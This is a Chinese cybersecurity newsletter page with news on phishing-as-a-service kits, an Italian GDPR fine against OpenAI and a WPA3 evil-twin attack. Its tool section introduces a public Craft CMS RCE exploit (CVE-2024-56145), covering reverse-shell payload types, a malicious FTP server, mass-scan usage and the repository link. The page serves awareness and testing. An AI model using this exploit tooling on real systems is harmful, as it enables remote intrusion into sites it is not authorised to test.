网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析

国内外要闻

Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析

    在网络安全的复杂战场中,近期出现了一个值得关注的动态:名为 Rockstar 2FA 的钓鱼即服务(PhaaS)工具包遭遇变故,意外推动了另一个新生服务 FlowerStorm 的猖獗扩张。

    据 Sophos 上周发布的新报告指出,运营 Rockstar 2FA 服务的团体似乎经历了至少部分基础设施的崩溃,与该服务相关的页面已无法访问。“这并非由于执法取缔行动,而是服务后端出现了一些技术故障。” 上月末,Trustwave 首次记录了 Rockstar 2FA,它作为一种 PhaaS 服务,能让不法分子发起钓鱼攻击,窃取微软 365 账户凭据和会话 cookie,绕过多重身份验证(MFA)保护。该服务被评估为 DadSec 钓鱼工具包的更新版本,微软以 Storm - 1575 之名对其追踪,多数钓鱼页面托管于.com、.de、.ru 和.moscow 顶级域名,不过.ru 域名的使用据信已随时间减少。

图片

    2024 年 11 月 11 日,Rockstar 2FA 似乎遭遇技术中断,转向中间诱饵页面时引发 Cloudflare 超时错误,伪造登录页面无法加载。虽然尚不清楚中断缘由,但此 PhaaS 工具包留下的空白,致使与 FlowerStorm 相关的钓鱼活动激增。FlowerStorm 至少自 2024 年 6 月起就已活跃,Sophos 称,二者在钓鱼门户页面格式及连接后端服务器窃取凭据的方法上存在相似之处,暗示可能有共同起源,且都滥用 Cloudflare Turnstile 防止页面请求来自机器人。有人怀疑 11 月 11 日的中断,要么代表其中一个团体的战略转向,要么是运营人员变动,抑或是有意拆分两项业务,现阶段尚无确凿证据将二者关联。

    使用 FlowerStorm 最频繁的目标国家包括美国、加拿大、英国、澳大利亚、意大利、瑞士、波多黎各、德国、新加坡和印度。Sophos 表示:“受攻击最严重的行业是服务业,尤其聚焦于提供工程、建筑、房地产、法律服务与咨询的公司。” 这些发现再次凸显出一种持续趋势:攻击者即便无需深厚技术专长,也能利用网络犯罪服务和通用工具大规模发动网络攻击,这为网络安全防护敲响了警钟,各方需进一步加强防范与监测,以应对此类不断演变的威胁。

图片

意大利因 ChatGPT 违反 GDPR 数据隐私规定对 OpenAI 罚款 1500 万欧元

    在数据隐私备受瞩目的当下,意大利的数据保护机构对 ChatGPT 的开发者 OpenAI 开出了高达 1500 万欧元(约合 1566 万美元)的罚单,原因是这款生成式人工智能应用在处理个人数据方面存在诸多问题。

    早在近一年前,意大利数据保护机构(Garante)就发现 ChatGPT 在违反欧盟《通用数据保护条例》(GDPR)的情况下,使用用户信息来训练其服务。该机构指出,OpenAI 未就 2023 年 3 月发生的安全漏洞向其通报,并且在没有充分法律依据的情况下,使用用户的个人信息来训练 ChatGPT。同时,还指责该公司违背了透明度原则以及对用户的相关信息告知义务。

    此外,Garante 表示:“OpenAI 也未设立年龄验证机制,这可能会使 13 岁以下儿童面临接触与其发展程度和自我认知不符的不当回应的风险。” 除了罚款,OpenAI 还被要求开展为期六个月的宣传活动,通过广播、电视、报纸以及互联网等渠道,增进公众对 ChatGPT 运作方式的了解。

    具体而言,要让公众知晓其为训练模型所收集的数据(包括用户和非用户信息)的性质,以及用户可用来反对、更正或删除这些数据的权利。Garante 补充道:“通过这次宣传活动,ChatGPT 的用户和非用户都必须清楚如何阻止生成式人工智能使用他们的个人数据进行训练,从而切实保障他们在 GDPR 下的权利。”

    意大利曾在 2023 年 3 月下旬率先以数据保护担忧为由,对 ChatGPT 实施了临时禁令。近一个月后,在 OpenAI 解决了 Garante 提出的相关问题后,ChatGPT 才恢复访问。OpenAI 在发给美联社的一份声明中称,这一处罚决定并不合理,其打算提起上诉,称该罚款金额几乎是其在意大利那段时期营收的 20 倍。同时,它还表示致力于提供有益且尊重用户隐私权的人工智能。

    此次裁决出台之前,欧洲数据保护委员会(EDPB)曾提出一种观点,即非法处理个人数据但在部署前已进行匿名化处理的人工智能模型,并不构成违反 GDPR 的行为。该委员会表示:“如果能够证明人工智能模型后续的运行不涉及个人数据处理,那么 EDPB 认为 GDPR 并不适用。因此,初始处理的非法性不应影响模型后续的运行。”

    而且,EDPB 还认为,当控制者在模型匿名化后,对部署阶段收集的个人数据进行后续处理时,GDPR 将适用于这些处理操作。本月早些时候,该委员会还发布了关于以符合 GDPR 的方式处理向非欧洲国家进行数据转移的指南,这些指南将接受公众咨询,截止日期为 2025 年 1 月 27 日,并指出 “第三国当局的判决或决定不能在欧洲自动得到认可或执行。如果一个组织响应第三国当局对个人数据的请求,这种数据流动就构成了转移,GDPR 就会适用。”

图片

WPA3 网络密码遭中间人攻击与社会工程学手段绕过

    在网络安全领域,近期研究有了令人担忧的发现:研究人员成功地通过结合中间人(MITM)攻击和社会工程学技术,绕过了 Wi-Fi 保护访问 3(WPA3)协议以获取网络密码。

    来自西印度群岛大学的凯尔・查迪、韦恩・古德里奇和科夫卡・汗开展的此项研究,凸显了最新无线安全标准中潜在的漏洞。WPA3 于 2018 年推出,旨在弥补其前身 WPA2 的缺陷,并为 Wi-Fi 网络提供更强的安全性。其关键特性之一是对等同时认证(SAE)协议,旨在使密码能抵御离线字典攻击。

    然而,研究人员证明可以利用 WPA3 过渡模式中的弱点,该模式用于与 WPA2 设备向后兼容。通过利用降级攻击,他们能够捕获部分 WPA3 握手信息,然后结合社会工程学技术来恢复网络密码。

图片

    攻击方法主要包含三个主要步骤:首先,使用降级攻击捕获握手信息;其次,将用户从原始 WPA3 网络中解除认证;最后,创建一个带有强制门户的 “恶意双胞胎” 接入点以获取密码。研究人员使用树莓派来模拟 WPA3 接入点,并利用 Airgeddon 等开源工具来创建恶意接入点和强制门户。当毫无防备的用户尝试连接到虚假网络时,会被提示输入 Wi-Fi 密码,然后该密码会与捕获的握手信息进行验证。

图片

    这项研究引发了对 WPA3 安全性的担忧,尤其是其过渡模式。研究发现,当未实施受保护管理帧(这是许多用户可能未意识到或未启用的设置)时,攻击能够成功。有趣的是,研究人员还发现一些设备无法连接到 WPA3 过渡网络,这与 Wi-Fi 联盟声称的与 WPA2 的向后兼容性相矛盾。

    虽然该攻击需要特定条件和用户交互,但它表明了保护无线网络面临的持续挑战。研究人员强调了用户教育以及正确配置 WPA3 网络以减轻此类风险的重要性。网络安全专家呼吁对 WPA3 的漏洞进行进一步调查,并开发更多的防护措施。由于 Wi-Fi 网络对于企业和个人而言都是关键基础设施,确保其安全性至关重要。

    这项研究的结果提醒人们,即使是最先进的安全协议也可能容易受到技术漏洞利用和社会工程学巧妙组合的攻击。随着 WPA3 采用率的增加,用户和制造商都必须保持警惕,并实施最佳实践以保护无线网络免受潜在攻击。研究团队计划继续开展工作,探索更多漏洞并开发对策,以增强 WPA3 和未来无线协议的安全性。他们的努力有助于在不断演变的数字安全环境中,网络安全专业人员与潜在攻击者之间持续的对抗。

图片

知识分享

CVE-2024-56145: Craft CMS 漏洞利用工具介绍

一、工具背景与用途

    这款工具旨在利用 Craft CMS 中存在的一个漏洞,该漏洞是由 Assetnote 出色的研究团队所发现的。这个漏洞源于对用户提供的模板路径处理不当,使得攻击者能够通过特制的有效载荷实现远程代码执行(RCE)。

二、工具特点

  1. 自动化 FTP 服务器:具备自动化的 FTP 服务器功能,可用于提供恶意的有效载荷,方便攻击者实施相关攻击行为。

  2. 多种反向 shell 有效载荷生成:支持生成多种类型(如 bash、nc、mkfifo 等)的反向 shell 有效载荷,使用者可根据具体需求进行选择,增加了攻击手段的灵活性。

  3. 漏洞检查功能:提供漏洞检查器,能够识别存在此漏洞的易受攻击目标,有助于攻击者筛选合适的攻击对象,也方便安全人员提前排查隐患。

  4. 多线程支持:支持多线程运行,能够实现更快的扫描速度,在面对大量目标时可以有效提高检测或攻击的效率。

  5. 易用的 CLI 界面:拥有清晰易用的命令行界面(CLI),操作过程中会给出明确的反馈信息,无论是专业安全人员还是有一定基础的使用者都能较方便地操作该工具。

三、搭建易受攻击的测试环境(设置漏洞测试实验室)

    若要设置用于测试目的的 Craft CMS 实例,可按照以下步骤进行操作:

  1. 首先创建相关目录并进入:

mkdir exploit-craft && \cd exploit-craft && \

2. 配置 DDEV 项目用于 Craft CMS:

ddev config \  --project-type=craftcms \  --docroot=web \  --create-docroot \  --php-version="8.2" \  --database="mysql:8.0" \  --nodejs-version="20" && \

3. 创建 DDEV 项目:

ddev start -y && \

4. 创建指定版本的 Craft CMS:

ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \

5. 安装特定的 CMS 版本:

ddev composer require "craftcms/cms:5.5.0" \  --no-scripts \  --no-interaction --with-all-dependencies && \

6. 设置 Craft CMS 的安全密钥:

ddev craft setup/security-key && \

7. 安装 Craft CMS:

ddev craft install/craft \    --username=admin \    --password=password123 \    --email=admin@example.com \    --site-name=Testsite \    --language=en \    --site-url='$DDEV_PRIMARY_URL' && \

8. 为 PHP 启用 register_argc_argv:

mkdir -p.ddev/php/ && \echo "register_argc_argv = On" >.ddev/php/php.ini && \ddev restart && \

9. 最后输出提示信息并启动项目:​​​​​​​

echo 'Nice, ready to launch!' && \ddev launch

四、工具使用方法

查看帮助信息:
运行工具时添加 --help 标志,就能查看可用的命令,命令格式如下:

python exploit.py --help

利用命令(Exploit Command):

若要利用某个目标的漏洞,使用以下命令格式:

python exploit.py exploit -u <TARGET_URL> -lh <LOCAL_HOST> -lp <LOCAL_PORT> -px <PAYLOAD_TYPE>

各参数含义如下:

-u 或 --url:指定目标 URL,此参数是必需的。-lh 或 --lhost:用于接收反向 shell 的本地 IP,也是必需参数。-lp 或 --lport:本地用于监听的端口,同样为必需项。-fh 或 --ftp-host:FTP 服务器主机地址。-fp 或 --ftp-port:FTP 服务器端口号。-px 或 --payload:有效载荷类型(可选 bash、nc、mkfifo 等),默认值为 bash。​​​​​​
例如:python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash

检查命令(Check Command)

python exploit.py check -u <TARGET_URL> -f <FILE_WITH_URLS> -t <THREADS> -o <OUTPUT_FILE>

各参数含义如下:​​​​​​​

-u 或 --url:单个目标 URL。-f 或 --file:包含多个要扫描的 URL 的文件。-t 或 --threads:用于扫描的并发线程数量。-o 或 --output:用于保存结果的输出文件。

例如:

python exploit.py check -f urls.txt -t 10 -o results.txt

    最后需要强调的是,应秉持负责任、符合道德的态度来使用这款工具,该工具的代码仓库地址为

 https://github.com/Chocapikk/CVE-2024-56145,使用者可前往获取更多详细内容。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/64942.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

抚琴成一快-如何即兴谱例

如何即兴配套谱例 1.即兴01谱例2.即兴02谱例 1.即兴01谱例 2.即兴02谱例 慢推弦&#xff0c;1.5比较合适

uniapp登录

第一步整登录 先整个appid APPID和APPSecret https://developers.weixin.qq.com/community/develop/article/doc/000ca4601b8f70e379febac985b413 一个账号只能整一个小程序 正确流程 调用uni.login https://juejin.cn/post/7126553599445827621 https://www.jb51.net/a…

[python]pymc3-3.11.0安装后测试代码

测试通过环境&#xff1a; pymc33.11.0 python3.8 测试代码&#xff1a; import arviz as az import matplotlib.pyplot as plt import numpy as np import pymc3 as pm RANDOM_SEED 8927 np.random.seed(RANDOM_SEED) az.style.use("arviz-darkgrid") # True p…

基于微信小程序的短视频系统(SpringBoot)+文档

&#x1f497;博主介绍&#x1f497;&#xff1a;✌在职Java研发工程师、专注于程序设计、源码分享、技术交流、专注于Java技术领域和毕业设计✌ 温馨提示&#xff1a;文末有 CSDN 平台官方提供的老师 Wechat / QQ 名片 :) Java精品实战案例《700套》 2025最新毕业设计选题推荐…

深入理解 Linux wc 命令

文章目录 深入理解 Linux wc 命令1. 基本功能2. 常用选项3. 示例3.1 统计文件的行、单词和字符数3.2 仅统计行数3.3 统计多个文件的总和3.4 使用管道统计命令输出的行数 4. 实用案例4.1 日志分析4.2 快速统计代码行数4.3 统计单词频率 5. 注意事项6. 总结 深入理解 Linux wc 命…

DataV的安装与使用(Vue3版本)

1、DataV(vue3)地址&#xff1a;DataV Vue3TSVite版 | DataV - Vue3 2、使用 npm install kjgl77/datav-vue3 安装 3、全局引入。 4、此时就可以按需使用了~

云原生服务网格Istio实战

基础介绍 1、Istio的定义 Istio 是一个开源服务网格&#xff0c;它透明地分层到现有的分布式应用程序上。 Istio 强大的特性提供了一种统一和更有效的方式来保护、连接和监视服务。 Istio 是实现负载平衡、服务到服务身份验证和监视的路径——只需要很少或不需要更改服务代码…

Flutter web - 5 项目打包优化

介绍 目前 flutter 对 web 的打包产物优化较少&#xff0c;存在 main.dart.js 单个文件体积过大问题&#xff0c;打包文件名没有 hash 值&#xff0c;如果有使用 CDN 会存在资源不能及时更新问题。本文章会对这些问题进行优化。 优化打包产物体积 从打包产物中可以看到其中 …

KingbaseES(金仓数据库)入门学习

前言 金仓是一种多进程架构&#xff0c;每一个连接到服务器的会话&#xff0c;在服务器上面都会为该会话分配进程 图形化界面管理 新建数据库名 然后新建一个模式 再创建一个表 新建一个表&#xff0c;然后设置列名 记得要保存 查询数据 也可以新建数据表&#xff0c;用命令…

基于Springboot的数字科技风险报告管理系统

博主介绍&#xff1a;java高级开发&#xff0c;从事互联网行业六年&#xff0c;熟悉各种主流语言&#xff0c;精通java、python、php、爬虫、web开发&#xff0c;已经做了多年的设计程序开发&#xff0c;开发过上千套设计程序&#xff0c;没有什么华丽的语言&#xff0c;只有实…

【大模型】ChatGPT 打造个人专属GPTs助手使用详解

目录 一、前言 二、GPTs介绍 2.1 GPTs是什么 2.2 GPTs工作原理 2.3 GPTs 主要功能 2.4 GPTs 应用场景 2.5 GPTs 优缺点 三、GPTs 创建个人专属应用操作过程 3.1 内置GPTs模板 3.1.1 内置GPTs使用过程 3.2 手动配置方式创建 GPTs 3.2.1 创建过程 3.3 使用对话方式创…

Cobalt Strike 4.8 用户指南-第十四节 Aggressor 脚本

14.1、什么是Aggressor脚本 Aggressor Script 是Cobalt Strike 3.0版及更高版本中内置的脚本语言。Aggressor 脚本允许你修改和扩展 Cobalt Strike 客户端。 历史 Aggressor Script 是 Armitage 中开源脚本引擎Cortana的精神继承者。Cortana 是通过与 DARPA 的网络快速跟踪计…

Vue(四)

1.Vuex 1.1 Vuex是什么 Vuex 是一个插件&#xff0c;可以帮我们管理 Vue 通用的数据。例如&#xff1a;购物车数据、个人信息数据。 1.2 vuex的使用 1.安装 vuex 安装 vuex 与 vue-router 类似&#xff0c;vuex 是一个独立存在的插件&#xff0c;如果脚手架初始化没有选 v…

基础9 CRTP 与 Expression Templates

目录 一、奇异递归模版(CRTP) 二、表达式模板 &#x1f349; 概要 &#x1f347; 奇异递归模板模式&#xff08;CRTP&#xff09; 动机与原理 &#x1f353; 表达式模板&#xff08;Expression Templates&#xff09; 动机与原理 &#x1f348; 示例代码 &#x1f35…

分布式协同 - 分布式事务_TCC解决方案

文章目录 导图Pre流程图2PC VS 3PC VS TCC2PC&#xff08;Two-Phase Commit&#xff0c;二阶段提交&#xff09;3PC&#xff08;Three-Phase Commit&#xff0c;三阶段提交&#xff09;TCC&#xff08;Try-Confirm-Cancel&#xff09;2PC、3PC与TCC的区别2PC、3PC与TCC的联系 导…

脑肿瘤检测数据集,对9900张原始图片进行YOLO,COCO,VOC格式的标注

脑肿瘤检测数据集&#xff0c;对9900张原始图片进行YOLO&#xff0c;COCO&#xff0c;VOC格式的标注 数据集分割 训练组 70&#xff05; 6930图片 有效集 20&#xff05; 1980图片 测试集 10&#xff05; 990图片 预处理 静态裁剪&#xff1a; 24-82&…

步进电机接线和stm32引脚分配

实验设备 24v&#xff08;12-48 v&#xff09;直流电源 stm32f103最小系统板 步进电机驱动器 采用混合式二相步进电机J-5718HBS2401-野火42步进电机&#xff0c;驱动器为野火EBF-MSD4805 本人参考接线方式如下&#xff1a; 如上图所示通常采用共阴接线方式&#xff0c;具体…

极乐 15.2.6 | 清爽版简约美观音乐软件,支持网易云歌单导入

极乐是一款使用起来非常轻松的音乐播放软件&#xff0c;它拥有清新简洁的画面&#xff0c;专注于音乐播放功能。最新版本全面升级了64位架构&#xff0c;带来了前所未有的性能提升和更稳定的体验。通过优化内存管理&#xff0c;降低了应用对系统资源的占用&#xff0c;确保设备…

4、mysql高阶语句

mysql高阶语句是对复杂的条件进行查询的操作。 排序—order by 加了desc表示由大到小 1、查询name和score&#xff0c;地址都是云南西路的按id进行由小到大排序 2、查询name和score&#xff0c;先按hobbid进行排序&#xff0c;再把结果按id进行排序 第一段字段必须要有相同的…

Docker部署GitLab服务器

一、GitLab介绍 1.1 GitLab简介 GitLab 是一款基于 Git 的开源代码托管平台&#xff0c;集成了版本控制、代码审查、问题跟踪、持续集成与持续交付&#xff08;CI/CD&#xff09;等多种功能&#xff0c;旨在为团队提供一站式的项目管理解决方案。借助 GitLab&#xff0c;开发…